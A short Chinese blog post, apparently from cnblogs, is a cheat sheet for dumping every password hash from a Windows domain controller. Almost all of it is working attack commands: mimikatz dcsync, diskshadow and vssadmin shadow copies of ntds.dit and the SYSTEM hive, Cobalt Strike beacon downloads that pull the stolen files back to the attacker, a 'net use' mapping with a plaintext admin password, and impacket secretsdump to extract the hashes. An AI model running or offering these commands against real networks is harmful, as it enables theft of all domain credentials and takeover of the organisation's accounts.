【域渗透】Windows域控导出Hash

一、dcsync导入域内所有hash

mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.local /all /csv exit"

二、利用diskshadow 之前需要先切换到 system32 目录下

diskshadow.exe
set context persistent nowriters
add volume c: alias stack
create
expose %stack% z: DISKSHADOW> exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit
delete shadows all
list shadows all
reset DISKSHADOW> exit
reg save hklm\system c:\windows\temp\system.hive

beacon> download ntds.dit

beacon> download system.hive

将两个文件从域控托回被控机

net use \\192.168.75.129\c$ /user:"yiwang\Administrator" "admin123"

move \\192.168.75.129\admin$\temp\ntds.dit c:\windows\temp\

move \\192.168.75.129\admin$\temp\system.hive c:\windows\temp\

net use * /del /yes

mpacket中用 secretsdump.py脚本进行解密

python secretsdump.py -system system.hive -ntds ntds.dit LOCAL >>hash.txt

四、vssadmin离线导入hash

vssadmin list shadows
vssadmin create shadow /for=c:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy65\windows\NTDS\ntds.dit c:\windows\temp\ntds.dit
vssadmin delete shadows /for=c: /quiet
esentutl /p /o c:\windows\temp\ntds.dit
reg save hklm\system c:\windows\temp\system.hive

参考：

https://xz.aliyun.com/t/2527#toc-1

posted @ 2019-07-25 11:16 aoaoaoao 阅读(1758) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

【域渗透】Windows域控导出Hash

公告